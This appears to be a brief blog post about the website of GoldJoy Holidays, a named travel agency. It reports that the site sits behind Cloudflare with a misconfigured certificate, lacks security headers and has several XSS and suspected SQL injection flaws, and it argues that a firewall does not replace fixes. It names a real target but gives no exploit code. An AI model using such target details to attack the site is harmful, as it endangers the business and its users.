After a quick check, GoldJoy Holidays is now running behind Cloudflare, and it is believed to be either a free plan or a Pro plan. The Cloudflare WAF (Web Application Firewall) may be set to high sensitivity and an SSL certificate is set. However, the SSL certificate provided by Cloudflare is a shared certificate and the IT staff of GoldJoy Holidays misconfigured it. Since the site has no appropriate security headers, it may be affected by MITM (Man-In-The-Middle) attacks.

The website of GoldJoy Holidays has several XSS (Cross Site Scripting) vulnerabilities and several suspected SQLi (SQL Injection) vulnerabilities. In addition, the website has some other minor security-related problems too. It is believed that the web application is Joomla! 1.5.x.

In my opinion, Cloudflare is not a good solution when the vulnerabilities at your website are not fixed. It will mislead the IT staff or users into believing that your site is secure. Cloudflare WAF can be bypassed. I hope that it is a workaround solution; otherwise, it is still dangerous.

Reference

[1] Yahoo News
[2] South China Morning Post News
[3] TVB News

That's all! See you.